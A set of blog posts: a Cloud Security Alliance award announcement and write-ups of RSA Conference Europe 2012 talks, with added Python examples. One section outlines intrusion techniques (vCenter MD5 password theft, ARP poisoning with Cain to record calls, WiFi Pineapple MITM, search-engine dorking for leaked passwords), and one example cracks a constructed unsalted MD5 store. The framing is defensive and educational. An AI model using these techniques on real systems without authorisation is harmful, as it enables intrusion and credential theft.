An Awarding Week!

I had planned a wrap-up post around my thoughts from the RSA conference for this week, but it has been a very busy and surprisingly rewarding week..  A combination of some university coursework due Monday and some great news has meant little time for writing (well, non-university writing anyway).  There will still be a wrap-up for the RSA conference, likely early next week, but I wanted to share some exciting news relating to the Security as a Service working group I help lead for the Cloud Security Alliance (CSA).

I found out this week that the CSA are giving me an award for the volunteer work I have done for them over the last year or so.  They are also assisting with getting me to their congress in Orlando from the 6th to 9th November, so I’ll be packing my bags and jetting off to the US for a few days!

The award is called the Ron Knode Service Award in honour of one of the early members of the CSA who passed away earlier this year.  For me this is a great piece of recognition as it is the first year these awards have been given out, and of the ~40000 members of the CSA, only 6 people have been recognised with this award!

Rather than continue on about it myself, I thought I would include the emails I was sent confirming the award, as they probably cover it better than I could;

The first was from Luciano (J.R.) Santos, the CSA’s Global Research Director –

Dear Kevin,

It is my great pleasure to inform you that you have been selected to receive the 1st Annual Ron Knode Service Award recognizing excellence in volunteerism. On behalf of the Cloud Security Alliance, I would like to congratulate you on receiving this award for the EMEA Region.  Ron Knode was an information security expert and member of the Cloud Security Alliance family, who passed away on May 31, 2012. Ron was an innovative thinker and the author of the CSA Cloud Trust Protocol. Ron was a cherished member of CSA, with endless energy and humor to guide his volunteer contributions.  In Ron’s memory, the Cloud Security Alliance in 2012 instituted the annual Ron Knode Service Award, recognizing excellence in volunteerism for 6 honorees from the Americas, Asia-Pacific and EMEA regions.

At this time, the ceremonies are being planned, but exact dates and locations have not been confirmed.   Daniele will be in touch with you when additional details become available.  In the meantime, if you have any questions please don’t hesitate to contact me or Daniele.  Warmest thanks for all of your hard work and outstanding contributions as a member of the Cloud Security Alliance.  We recognize how much time and energy you put into our organization, and we deeply appreciate all of your efforts.  

We are thrilled to present you with this award.  Our PR Manager Kari Walker will be reaching out to you as we put together a press release officially announcing the winners.  In addition, we’ll need you to send a current photo and bio to our webmaster Evan Scoboria.  Evan will be creating a section on the CSA main site honoring the winners of this award.  We value your volunteer contributions and believe that the devotion of volunteers like you will continue to lead CSA into the future.  Congratulations on a job well done!

Best Regards,

Luciano (J.R.) Santos

CSA Global | Research Director

———

The second email was from Jim Reavis, the CSA Executive Director

Thank you all for your efforts.  To narrow this list down to 6 globally was a major chore and you should be proud. Volunteerism for the common good is among the highest callings in our industry, and the CSA family appreciates your outstanding contributions.  Please let us know if there is anything that CSA can do for you.  As we continue to grow, we look forward to working together and being able to do even more for you.

Best Regards,

Jim Reavis
Executive Director, Cloud Security Alliance

———

As you may have guessed, I am extremely pleased to be receiving this award; it really has helped make the work worthwhile, on top of the satisfaction of seeing it all published of course!

For those of you going to the CSA Congress, I look forward to seeing / meeting you in a couple of weeks; for everyone else, watch this space for the RSA conference wrap-up and further writings on security and architecture.

K


RSA Conference Europe 2012 – Hacking Senior Management..

Hacking Senior Management – Selling Security to the Board

Brian Honan – CEO, BH Consulting

Security events are now very much mainstream news; consider stories about Anonymous, Sony (PlayStation Network), Citibank, the IMF, RSA etc..

Hacking / cracking has evolved from the early days of wanting to understand and make things better, through wanting personal fame / recognition, to wanting personal / organisational gain (criminals), national interests (spies) and ‘hacktivism’.  The threats have evolved to become a lot more serious.

Along with malicious threats, we also have to be aware of careless users: losing laptops and other devices, sending sensitive emails to the wrong recipient etc.

In addition to threats and users, organisations also have to comply with ever increasing levels of regulation, both from industry (PCI-DSS) and governments (SOX etc.).

Topping this off is the fact that IT is ever more critical to all areas of business / organisational functioning.

This threat is well recognised right up to the US presidential level with President Obama quoted as saying;

“the cyber threat to our nation is one of the most serious economic and national security challenges we face.”

MI6 has also addressed the UK Parliament on these issues.

So given the level of the threats, and the fact that IT is a regular agenda item in the boardroom, you would think that the reaction from management / the board would be –

‘Get this done! Here is the budget to fix things..’

However, the response is more often than not apathy, or heads in the sand.

Why is this?

Are we doing something wrong as a security industry?

Hacking systems == Easy

Hacking applications == Easy

Hacking management != Easy

We often think management isn’t clever if they don’t understand the issues.  This is not true: senior leadership are usually intelligent and educated, and also very busy.

How do we solve this?

We must get inside their heads and understand their drivers.  These are things like profit and loss, audits, reports to shareholders etc.

We like to talk about 0-days, attacks, hackers, exploits, worms etc.

When we talk like this management hear BLAH BLAH BLAH…

They think in terms of money; we are very bad at this.  Do we consider on-going maintenance costs as well as the initial cost?

In order to hack a system you need to understand it!

Thoughts on how;

–          We (IT / IT security) must get better at understanding the business.  Make sure you understand your business strategy and plans.

–          We must reduce the FUD (Fear Uncertainty and Doubt), the sky is not always falling – be realistic and talk in business terms.

–          Focus on the benefits, e.g. if we do this and implement that we’ll reduce security incidents by XX and save £XX.

–          Understand and explain the security trade-offs, you’ll never be 100% secure so understand and explain what different choices mean.

–          Act professionally – talk about improving assurance rather than penetration testing – use professional language and actions.

–          Speak plainly and translate terminology.  Instead of ‘there is a 0-day vulnerability on the server that could give root privileges to the attacker’, try ‘there is a vulnerability on the database server that manages our key financial data which could allow someone to view all of that data’.

–          Engage with the business, don’t hide in the basement!  Present metrics and information back to the business about the benefits of our AV, DLP, proxy servers etc. – make the benefits we already provide and plan to provide much more visible.

 

To have secure systems and more importantly a secure organisation we all have to work together!

Thoughts about next steps from the talk;

Within 3 Months:

–          Review How You Present Security Issues to Senior Management

–          Focus on Cost and Benefits

Within 6 Months

–          Become More Visible With Management

–          Align Information Security With Business

Within 12 Months

–          Get Approval for New Infosec Initiatives

–          Have the Business Come to You !!

For security to become more successful, and indeed a key part of business process we need to become more professional and business minded.  We must engage better with the business and speak in the language and terms that they understand and care about.  These are great points and ones we as an industry really need to bear in mind if we want to become a more central part of our organisations.

K

RSA Conference Europe 2012 – How to Build a Cyber Intelligence Capability

Stewart Bertram – Cyber Intelligence Team Manager, VeriSign

Talk will cover;

The socio-technical approach to cyber intelligence team design / capability.

The growth of the influence of the intelligence team within the wider business context

Legal and reporting points

So just what is a Socio-technical system?

“an approach to complex organizational work design that recognizes the interaction between people, information and technology in workplaces”

So how should the new hypothetical cyber intelligence team be made up?

The talk proposes a combination of

–          Computer Science folk

–          Former military / intelligence

–          Social science background / experience

While computer science people are the obvious choice that no one would argue with, what do the other two facets bring?

Military intelligence – Counter-insurgency experience, the battle for hearts and minds, human terrain analysis; this experience helps them to better know what to look for..

Social science – An understanding of social interactions and ‘networks’ – how groups of people interact and work together.  This is useful for both understanding the behaviour of your adversary groups, and also understanding how to get buy in from your organisation.

Your team should work to best leverage technology to do the heavy lifting and initial filtering so that they can look at detailed aggregated / fused information.  This allows them to use their skills and experience to make the best decisions and risk assessments.  If your team is spending their time looking at the base information, they will only be able to view a tiny amount of the data and thus you will frequently be surprised.

So, why are we even discussing a cyber-intelligence capability in the first place?  Is Cyber threat posing a greater risk than 10 years ago?

Yes.  Driven by the contextual change to the importance of cyber space to Western Society – we are hugely reliant on IT and the Web for almost all aspects of our lives now and this is only increasing.

Cyber intelligence teams used to exist on the periphery of the business or as a subset of the IT security team.  Increasingly they are, or should be, core to the business and driving change across departments including IT, IT security, HR, Finance etc.

For further reading, the paper #intelligence by Sir David Omand et al is strongly recommended.

We need to ensure a balance is struck between online security and privacy.  Consider also where social media intelligence (SOCMINT) fits into your model;

“SOCMINT is not yet capable of making a decisive contribution to public security and safety.”

“SOCMINT does not fit easily into the existing systems we have developed to ensure intelligence collected can be confidently acted on.”

Consider also Open Source evaluation.

As with any intelligence, you need to consider the quality of the intelligence and the quality of the source.

If you are going to perform any of this directed or semi directed monitoring of social media you need to understand the legal issues surrounding it, and have a legal framework in place within your organisation.

As a closing comment the talk stated;

“If today is the information age then tomorrow will be the intelligence age”

Overall this talk was a little light and glossed over quite a bit, but then it was a huge topic to cover in 50 minutes, and I realised the speaker wrapped up within 30 minutes..  This would definitely have benefited from taking the full allotted time.  However there were several good points raised and definitely things to think about – how would this fit into your organisation?

K

RSA Conference Europe 2012 – Adversary ROI

Adversary ROI: Evaluating Security from the Threat Actor’s Perspective

Joshua Corman – Director, Security Intelligence, Akamai Technologies
David Etue – VP, Corporate Development Strategy, SafeNet

The premise of this talk is that adversaries have developed better ROI models than we have relating to our security spend..

As an organisation we cannot protect everything.  We have scarce security resources.  Are we protecting our most critical assets?  Think like our adversaries – what is important to them, not just what we think is important to us.  It is not just about what you have done, but WHO is after you..

Why does security ROI fail?  Security provides protection; it is not a profit centre..

Does ROSI (Return on Security Investment) improve things?

ROSI = ((Risk Exposure * % Risk Mitigated) – Solution cost) / Solution cost.

However in the real world, much of the risk exposure and risk mitigation have to be educated guesses at best.  So how accurate can we ever be?

The adversary does not care about your ROI / ROSI; they are results orientated, and all they care about is whether they can get the assets of yours that they want and achieve an ROI that is acceptable to them.

Thinking about adversary ROI came about from looking at risk – a risk requires a threat and a vulnerability that results in a negative consequence.  As we have finite resources we must optimise the risk equation for our success.

Consider what a “threat” is.  The proposal is that it is an Actor with a Capability and a Motive.  Stuxnet, ‘0-days’ etc. are the ‘bullets’; without the actor they would do nothing..

While adversaries have limited resources, consider the adage, ‘why spend $40M on it if you can steal it for $1M?’.  There are many criminal organisations willing to spend $1M+ on a single exploit if the return makes this worthwhile.

Adversary ROI = (((Attack Value – Cost of Attack) / Cost of Attack) * Probability of Success) – Deterrence, where Attack Value = value of assets compromised + adversary value of operational impact, and Deterrence = % chance of getting caught * cost of getting caught.
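To make the arithmetic behind the ROSI and adversary ROI formulas concrete, here is an added Python example (mine, not from the talk or the speakers) that evaluates both for a constructed scenario and then solves for the chance of getting caught at which the attack stops paying. All the figures are invented; in particular, the cost of getting caught is expressed as a multiple of the attack cost so that the deterrence term sits on the same scale as the return ratio, which is an assumption the formula as presented leaves open.

```python
"""Worked ROSI and adversary-ROI arithmetic with constructed figures (added example)."""


def rosi(risk_exposure, fraction_mitigated, solution_cost):
    """ROSI as given in the talk: ((exposure * fraction mitigated) - cost) / cost."""
    return ((risk_exposure * fraction_mitigated) - solution_cost) / solution_cost


def adversary_roi(asset_value, impact_value, attack_cost,
                  p_success, p_caught, cost_if_caught):
    """Adversary ROI as given in the talk, with operator precedence made explicit.

    attack value  = value of assets compromised + adversary value of operational impact
    gross return  = (attack value - cost of attack) / cost of attack
    deterrence    = P(caught) * cost of getting caught
    adversary ROI = gross return * P(success) - deterrence

    Assumption: cost_if_caught is a multiple of attack_cost, so both terms are ratios.
    """
    attack_value = asset_value + impact_value
    gross_return = (attack_value - attack_cost) / attack_cost
    return gross_return * p_success - p_caught * cost_if_caught


def breakeven_p_caught(asset_value, impact_value, attack_cost, p_success, cost_if_caught):
    """Chance of getting caught at which adversary ROI falls to zero (clamped to [0, 1]).

    Solving gross_return * p_success = p_caught * cost_if_caught for p_caught tells the
    defender how much detection and attribution capability this adversary has to face
    before the attack stops paying.
    """
    attack_value = asset_value + impact_value
    gross_return = (attack_value - attack_cost) / attack_cost
    return min(max(gross_return * p_success / cost_if_caught, 0.0), 1.0)


# Constructed scenario: a $5M asset, a $1M exploit (the figure quoted in the talk),
# even odds of success, a 5% chance of being caught that costs 10x the attack budget.
BASELINE = dict(asset_value=5_000_000, impact_value=0, attack_cost=1_000_000,
                p_success=0.5, p_caught=0.05, cost_if_caught=10)

# Two candidate controls, each expressed as the change it makes to the adversary's inputs.
CONTROLS = {
    "better detection and response": dict(p_caught=0.25),
    "hardening that doubles attack cost": dict(attack_cost=2_000_000),
}


def rank_controls(baseline, controls):
    """Return (control, adversary ROI) pairs, most effective first (lowest adversary ROI)."""
    ranked = []
    for name, change in controls.items():
        params = {**baseline, **change}
        ranked.append((name, adversary_roi(**params)))
    return sorted(ranked, key=lambda pair: pair[1])


if __name__ == "__main__":
    print("ROSI of a $400k control mitigating 60% of $2M exposure:",
          rosi(2_000_000, 0.6, 400_000))
    print("Baseline adversary ROI:", adversary_roi(**BASELINE))
    print("Break-even P(caught):", breakeven_p_caught(
        BASELINE["asset_value"], BASELINE["impact_value"], BASELINE["attack_cost"],
        BASELINE["p_success"], BASELINE["cost_if_caught"]))
    for name, roi in rank_controls(BASELINE, CONTROLS):
        verdict = "unprofitable" if roi < 0 else "still pays"
        print(f"{name}: adversary ROI {roi:+.2f} ({verdict})")
```

With these numbers the baseline attack returns 1.5 times its cost and needs a 20% chance of being caught before it stops paying; raising detection to 25% pushes adversary ROI negative, while doubling the attacker's cost through hardening leaves it positive. That is the talk's point in miniature: the control that looks best on our ROSI sheet is not necessarily the one that changes the adversary's decision.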

Discussion around profiling a particular Actor or class of actors;

Actor Classes (States, Crime, Hactivists…)

Have

Motivations (Financial, Industrial, Ideological…)

Which define their

Targets (Credit card #s, Intellectual property, Cyber Infrastructure…)

With various

Impacts (Reputational, Personal, Availability…)

Via many

Methods (Tools “Metasploit”, Phishing, Malware, Physical…)

Using methods like this to understand the who and why of those likely to be attacking you can be a great aid to your risk assessment activities.

Consider the already discussed ‘HD Moore’s Law’, suggesting that attacker power increases exponentially, doubling every 18 months (as with Moore’s law for CPU power).  The ability or strength of the casual attacker grows at the rate of software and tools such as Metasploit, Cain, and the Pineapple etc.

Does it matter who is attacking?  Yes; as an example, in the survey of top threats, abuse of system access / privileges was number 18 in the overall list, so if you choose to try and mitigate the top 10 you may miss this one.  However for those wishing to steal intellectual property and classified information this was the number one attack.  Knowing who is trying to attack you, and why, will help ensure you have the correct focus for your very finite security budget and resources.

While patching is important, once we have patching in order do we need to keep looking at this as one of our key security metrics?  For example 25% of current breaches are via SQL injection, how much effort is spent on application and code security?  What metrics do you have for ensuring the security of your applications?

I’d recommend reviewing the Verizon Business Data Breach Investigations Report for more information on breaches and breach types etc.  This contains a lot of very useful information to aid your understanding of the current landscape.

Have a look at some of these interesting free tools that can help with your security defences;

WebLabyrinth – http://code.google.com/p/weblabyrinth/

FOG Computing – http://sneakers.cs.columbia.edu:8080/fog/

SCIT: Self Cleansing Intrusion Tolerance – http://cs.gmu.edu/~asood/scit/

Honeyports – http://honeyports.sourceforge.net/

I don’t have time to cover all of these here, but have a look for yourselves if you want some more tools to make attackers lives considerably more difficult should they get onto your networks.

So, how do we best get non-security executives involved?  Some questions you can put to them to get the conversation started;

–          What protected or sensitive information do we have?

–          What adversaries desire the information and why?

–          What is the value of the information to the organization?

–          How would the adversary value it?

–          What are the adversary’s capabilities?

–          What controls protect the information?

Summary and next steps;

Remember these are ways to enrich and complement your existing security, not instead of it!

–          Start with a blank slate

–          Engage non security people – you must have executive buy in, and should aim to gradually make security front and centre as part of the corporate culture

–          Identify your most likely adversaries and thus their likely motivations – work with other businesses in your industry – information and knowledge sharing!

  • Obtain and share adversary centric intelligence;
  • Threat intelligence
  • Brand chatter monitoring
  • Information sharing

–          Simulate adversary-driven scenarios – improve on your penetration testing.

K

RSA Conference Europe 2012 – Hacking the Virtual World

Jason Hart, SafeNet

This talk demonstrates some live tools and hacking demos, so starts with the standard disclaimer;

ALWAYS GET PERMISSION IN WRITING!

Performing scans, password cracking etc. against systems without permission is illegal.

Use any mentioned tools and URLs at your own peril!

CIA – Confidentiality, Integrity, Availability (plus Accountability / Auditability) – while still important, has gone out of the window in terms of being the core mantra for many security professionals and managers.

Evolution of the environment and hacking;

1st Age: Servers  – FTP, Telnet, Mail, Web – the hack left a footprint

2nd Age: Browsers – JavaScript, ActiveX, Java etc.  These are getting locked down, slowly and incompletely

3rd Age: Virtual Hacking – Gaining someone’s password is the skeleton key to their life and your business.  Accessing data from the virtual world can be simple – Simplest and getting easier!

Virtual World – with virtual back doors.  This is the same for cloud computing and local virtual environments.  What do you do to prevent your virtual environment administrators copying VMs and even taking these copies home?  You need to prove both ownership and control of your data.

The question is posed – how much have we really learnt over the last 15 years or so?  We need to go back to basics and re-visit the CIA model.  Think of the concept of a ‘secure breach’: if our important data is protected and secure, a breach will still not expose it.

Demo against VMware 4.1 Update 1.  Using a simple scan, you can find multiple VMware servers and consoles exposed directly to the internet; remember though that these attacks can just as easily be launched from within your environment.

Outside of this talk, this raises the question – how segregated are your networks?  Do you have separate management, server, database etc. networks with strong ACL policies between them?  If not I’d recommend re-visiting your network architecture.  Now.

Once you find a vCenter server, the admin / password file is easily accessible and only hashed in MD5.  This can be broken with rainbow tables very quickly.  You can then easily gain access to the console and thus control of the whole environment.
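The point about MD5 and rainbow tables generalises to any unsalted, fast hash. The added Python example below (mine, not from the talk) builds a precomputed hash-to-password table from a constructed wordlist, reverses a constructed unsalted MD5 credential store with nothing more than dictionary lookups, and then shows why the same store protected with per-user salted PBKDF2 has to be attacked one user and one guess at a time. The usernames, passwords and wordlist are all invented and have nothing to do with any real vCenter installation.

```python
"""Precomputed-table attack on unsalted MD5 vs salted, iterated hashing (added example)."""
import hashlib
import os

# Constructed wordlist standing in for the dictionary a rainbow table is built from.
WORDLIST = ["password", "vmware", "Welcome1", "admin123", "Summer2012", "letmein"]


def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup(words):
    """Precompute hash -> plaintext once; the same table works against every unsalted store."""
    return {md5_hex(w): w for w in words}


def crack_unsalted(store, table):
    """store maps user -> md5 hex. Each credential costs exactly one dictionary lookup."""
    return {user: table[h] for user, h in store.items() if h in table}


def shared_passwords(store):
    """Unsalted hashing also leaks which accounts share a password: their hashes are equal."""
    by_hash = {}
    for user, h in store.items():
        by_hash.setdefault(h, []).append(user)
    return [users for users in by_hash.values() if len(users) > 1]


ROUNDS = 50_000  # PBKDF2 iteration count, kept modest so the example runs quickly


def salted_hash(password, salt, rounds=ROUNDS):
    """PBKDF2-HMAC-SHA256 with a per-user random salt: nothing can be precomputed across
    users, and every guess costs `rounds` HMAC operations instead of one MD5."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds).hex()


def make_salted_entry(password):
    salt = os.urandom(16)
    return salt, salted_hash(password, salt)


def crack_salted(store, words):
    """store maps user -> (salt, hex). Returns (cracked, number of hash computations):
    the work is per user and per guess, with nothing reusable between users."""
    cracked, work = {}, 0
    for user, (salt, digest) in store.items():
        for word in words:
            work += 1
            if salted_hash(word, salt) == digest:
                cracked[user] = word
                break
    return cracked, work


# Constructed credential stores (not real data).
UNSALTED_STORE = {
    "admin": md5_hex("vmware"),
    "svc_backup": md5_hex("Summer2012"),
    "operator": md5_hex("vmware"),                      # same password as admin, same hash
    "root": md5_hex("correct horse battery staple"),    # not in the wordlist
}
SALTED_STORE = {
    "admin": make_salted_entry("vmware"),
    "root": make_salted_entry("correct horse battery staple"),
}

if __name__ == "__main__":
    table = build_lookup(WORDLIST)
    print("unsalted MD5, table lookups:", crack_unsalted(UNSALTED_STORE, table))
    print("accounts sharing a password:", shared_passwords(UNSALTED_STORE))
    cracked, work = crack_salted(SALTED_STORE, WORDLIST)
    print(f"salted PBKDF2: cracked {cracked} after {work} guesses of {ROUNDS} rounds each")
```

Three of the four unsalted accounts fall to the table instantly, and the two that share a password are visible as such without cracking anything. Against the salted store the attacker must redo the full iterated hash for every guess and every user, so the cost scales with the size of the wordlist times the number of accounts, which is the whole point of salting and stretching.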

To make things even easier, tools like Metasploit make this sort of attack as simple as a series of mouse clicks.  I’d recommend checking out Metasploit, it’s a great tool.

Look at www.cvedetails.com for details on just how many vulnerabilities there are, this site also classifies the vulnerabilities in terms of criticality and whether they impact CIA.  This is a great input into any risk assessment process.

Discussion around the WiFi Pineapple wireless tool;

http://hakshop.myshopify.com/products/wifi-pineapple

In brief this tool can do things like;

–          Stealth Access Point for Man-in-the-Middle attacks

–          Mobile Broadband (3G USB) and Android Tethering

–          Manage from afar with persistent SSH tunnels

–          Relay or Deauth attack with auxiliary WiFi adapter

–          Web-based management simplifies MITM attacks

–          Expandable with community modules

–          And much more – look it up if you are interested, it has huge capabilities!

This tool is only $99 for anyone who thought the barrier to entry for this type of functionality would be high.

Then try linking a tool like this with the capabilities of software such as Cain & Abel;

http://www.oxid.it/cain.html

This is described as a password recovery tool, but can do so much more.  A prime example of the abilities of this tool is ARP poisoning such that you can see all the traffic on a given subnet / VLAN.  I have personally used this to record (with approval of course!) VoIP calls in order to demonstrate the need to encrypt VoIP traffic.  Cain even nicely reconstructs individual call conversations for you!
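ARP poisoning of the kind Cain performs is also straightforward to spot if you are watching for it. The added Python example below (mine, not from the talk) runs a small detector over a constructed sequence of ARP replies: it alerts when an IP address's MAC changes (critical when that IP is the default gateway) and when a single MAC starts answering for more than one IP, which is what a man-in-the-middle between a workstation and its gateway looks like on the wire. The addresses and the gateway are invented; in practice you would feed it from a packet capture or the switch's ARP tables.

```python
"""Detecting ARP poisoning from observed ARP replies (added example)."""
from collections import defaultdict

GATEWAY_IP = "10.0.0.1"  # constructed

# Constructed ARP reply observations: (seconds, sender IP, sender MAC).
# From t=12 an attacker answers for both the gateway and a workstation.
ARP_REPLIES = [
    (0.0, "10.0.0.1", "00:11:22:33:44:01"),
    (0.5, "10.0.0.20", "00:11:22:33:44:20"),
    (1.0, "10.0.0.30", "00:11:22:33:44:30"),
    (12.0, "10.0.0.1", "00:aa:bb:cc:dd:ee"),
    (12.0, "10.0.0.20", "00:aa:bb:cc:dd:ee"),
    (12.5, "10.0.0.30", "00:11:22:33:44:30"),
]


def detect_arp_spoofing(replies, gateway_ip):
    """Return alert dicts for IP->MAC changes and for MACs that claim several IPs."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for seconds, ip, mac in replies:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append({
                "time": seconds,
                "severity": "critical" if ip == gateway_ip else "high",
                "reason": f"{ip} moved from {previous} to {mac}",
            })
        ip_to_mac[ip] = mac
        first_claim = ip not in mac_to_ips[mac]
        mac_to_ips[mac].add(ip)
        if first_claim and len(mac_to_ips[mac]) > 1:
            alerts.append({
                "time": seconds,
                "severity": "medium",
                "reason": f"{mac} now answers for {sorted(mac_to_ips[mac])}",
            })
    return alerts


def attacker_macs(replies):
    """MACs that claimed more than one IP: the likely poisoning host(s)."""
    mac_to_ips = defaultdict(set)
    for _, ip, mac in replies:
        mac_to_ips[mac].add(ip)
    return sorted(mac for mac, ips in mac_to_ips.items() if len(ips) > 1)


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES, GATEWAY_IP):
        print(f"t={alert['time']:>5} {alert['severity']:<8} {alert['reason']}")
    print("suspected poisoning host(s):", attacker_macs(ARP_REPLIES))
```

A DHCP lease moving to a new device also shows up as an IP changing MAC, so in a real deployment you would suppress changes that match the DHCP server's lease table and keep the hard alert for static addresses such as the gateway. The preventive counterpart is static ARP entries on critical hosts and dynamic ARP inspection on the switches.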

This is another personal favourite of mine – if your VoIP is not encrypted, why not?  Does your board know it is trivially easy to record their calls, or those of finance and HR etc., on your network?

The talk went on to cover some further easy attacks, such as those using the power of Google search syntax to gain information from Dropbox, SkyDrive, Google Docs etc.  An example was finding Cisco passwords in Google Docs files.  This leads on to another question: are you aware of just how much data your organisation has exposed in the wild to people who merely know how to search intelligently and leverage the powerful searching capabilities of engines such as Google?

To make things even easier, Stach & Liu have a project called the ‘Google Hacking Diggity Project’ that has created a freely downloadable tool for creating complex Google / Bing searches with specific tasks in mind, such as hacking cloud storage etc.

This and various other attack and defence tools can be downloaded here;

http://www.stachliu.com/resources/tools/google-hacking-diggity-project/

I’d recommend you work with your organisation to use these constructively in order to understand your exposure and then plan to remediate any unacceptable risks you discover.  The live demonstration actually found files online with company usernames and passwords in, so this exposure is demonstrably real for many organisations.

The talk ended with a brief comment on social networking and how the data available here, such as where you are from, which schools you went to etc., can give hackers easy access to the answers to all your ‘secret’ questions.

Remember the term ‘secure breach’ – our important data is all encrypted with strong, robust processes.  We were hacked, but it doesn’t matter.  The CI part of CIA is critical!

I loved this talk, some great demos and reminders of useful tools!

As mentioned at the start, please be sensible with the use of any of these tools and gain permission before using them against any systems.

K

RSA Conference Europe 2012 – Encrypt your cloud

Davi Ottenheimer – president, flyingpenguin

A perceived lack of security in the cloud is still one of the primary issues preventing organisations moving to the cloud.

I was hoping from the title this would touch on the issues with encrypting data while it is processed, but the introduction really only discussed data at rest and in transit.  We all know that;

–          Technically, encrypting data moving to, from and around the cloud is not difficult; we have been using SSL / TLS etc. to achieve this on the public internet for years.

–          Encrypting data at rest is also technically easy and again something we have been doing for years for example with public key cryptography.

–          Even deleting data in the cloud can effectively be dealt with via good key management – if your data is encrypted with strong encryption, when you want to ‘delete’ it you can just delete the key!
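The ‘delete the key’ point is worth seeing end to end, so here is an added Python example (mine, not from the talk) of the envelope-encryption pattern it relies on: each object is encrypted under its own data-encryption key (DEK), the DEKs are wrapped under a master key that never leaves the key vault, and shredding an object means deleting its wrapped DEK while the ciphertext stays wherever the provider put it. To keep the example runnable with the standard library only, the cipher is an HMAC-SHA256 counter-mode keystream with an encrypt-then-MAC tag and separately derived keys; that is a stand-in for AES-GCM, not something to deploy. Object names and contents are constructed.

```python
"""Envelope encryption and crypto-shredding with standard-library primitives (added example)."""
import hashlib
import hmac
import os

NONCE_LEN, TAG_LEN = 16, 32


def _derive(key, label):
    """Separate confidentiality and integrity keys from one 256-bit key."""
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream(enc_key, nonce, length):
    """HMAC-SHA256 in counter mode as a PRF keystream: a stand-in for a real cipher (AES-GCM)."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(key, plaintext):
    """Return nonce || ciphertext || tag; the tag covers nonce and ciphertext (encrypt-then-MAC)."""
    enc_key, mac_key = _derive(key, b"enc"), _derive(key, b"mac")
    nonce = os.urandom(NONCE_LEN)
    stream = _keystream(enc_key, nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def decrypt(key, blob):
    enc_key, mac_key = _derive(key, b"enc"), _derive(key, b"mac")
    nonce, ciphertext, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: wrong key or tampered ciphertext")
    return bytes(c ^ k for c, k in zip(ciphertext, _keystream(enc_key, nonce, len(ciphertext))))


def authenticates(key, blob):
    """True if blob verifies under key; False on tampering or a wrong key."""
    try:
        decrypt(key, blob)
        return True
    except ValueError:
        return False


class KeyVault:
    """Per-object DEKs wrapped under a master key (KEK) that stays with the data owner.

    The cloud store only ever holds ciphertext. Deleting an object's wrapped DEK makes
    that ciphertext permanently unreadable (crypto-shredding), however many copies or
    backups of it the provider keeps.
    """

    def __init__(self):
        self._kek = os.urandom(32)
        self._wrapped = {}

    def new_dek(self, object_id):
        dek = os.urandom(32)
        self._wrapped[object_id] = encrypt(self._kek, dek)
        return dek

    def dek(self, object_id):
        if object_id not in self._wrapped:
            raise KeyError(f"no key for {object_id!r}: object has been cryptographically shredded")
        return decrypt(self._kek, self._wrapped[object_id])

    def shred(self, object_id):
        self._wrapped.pop(object_id, None)


def store_object(vault, cloud, object_id, data):
    cloud[object_id] = encrypt(vault.new_dek(object_id), data)


def read_object(vault, cloud, object_id):
    return decrypt(vault.dek(object_id), cloud[object_id])


def demo():
    """Store, read back, shred, then confirm the still-present ciphertext is useless."""
    vault, cloud = KeyVault(), {}
    store_object(vault, cloud, "finance/q3-report.pdf", b"quarterly numbers")
    readable = read_object(vault, cloud, "finance/q3-report.pdf") == b"quarterly numbers"
    vault.shred("finance/q3-report.pdf")
    try:
        read_object(vault, cloud, "finance/q3-report.pdf")
        shredded = False
    except KeyError:
        shredded = True
    return readable, shredded, "finance/q3-report.pdf" in cloud


if __name__ == "__main__":
    print("readable before shred, unreadable after, ciphertext still stored:", demo())
```

The structure, rather than the toy cipher, is the lesson: the provider holds ciphertext and wrapped DEKs it cannot open, the owner holds the KEK, and ‘delete’ becomes a key management operation you control and can audit instead of a promise about disk sectors you cannot verify.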

For a general overview of issues with encryption in the cloud, the talk was interesting and useful covering terminology and some details on key exchange etc.

Some useful terminology when talking about crypto;

–          Encryption: reversible operation, cryptographically turns input into illegible cipher text

–          Hashing: non-reversible operation, cryptographically transforms input to illegible message

–          Tokenization: reversible operation, substitutes input with data that has no inherent value

–          Key management: life-cycle of a secret including creation, distribution, use and deletion

Consider the human / social element.  Some good slides on the Diffie-Hellman key exchange – worth looking up if you want a better understanding of this.

Consider how safe virtual machines are – how protected are they from someone who has full hypervisor access?  What happens when a VM moves to another host?  For example, VMware vMotion does not support encryption, so your machine is copied to another host in ‘clear text’ and data contained in the guest may be accessible to anyone with network access.

Some slides and discussion on Encryption as a Service, which is cool as this is one of the domains of Security as a Service that we have identified and documented.  I’d recommend looking up the Key Management Interoperability Protocol (KMIP) and Enterprise Key Management Infrastructure (EKMI) if you want to know more about potential Encryption as a Service key management options.

Ensure you understand key persistence and management – where are your keys?  For example, make sure they are not in things like machine templates, otherwise anyone who can create a clone from your template can have root access on all the machines made from that template.  Understand who has your keys, and who can access them and your data – read up on the Dropbox legal case for an example of this and of how important it is to understand SLAs from providers.

The presentation ended with 6 recommendations for next steps;

Next 3 months

–          Classify data for segmentation

–          Setup key management policy and procedures

–          Select standards for interoperability

Next 6 months

–          Configure apps for key and crypto management

–          Select a key app and crypto app solution

–          Plan and initiate a project to protect data in cloud

Obviously the timings will very much depend on the speed at which your organisation moves!

Overall this was an interesting talk, with some good considerations that highlighted the fact most issues with encryption in the cloud are people / process related rather than technology.  We already have known and understood methods for encrypting data in transit and at rest.

However the talk didn’t really touch on the issues around data processing aside from a mention on tokenization that allows portions of data to be available for some processing while protecting the sensitive portion.  This was a bit disappointing for me as I was hoping this area would be covered in some depth as it’s still the one hole left in the ‘can my data in the cloud be encrypted ALL the time, even when searching and processing it?’ question.
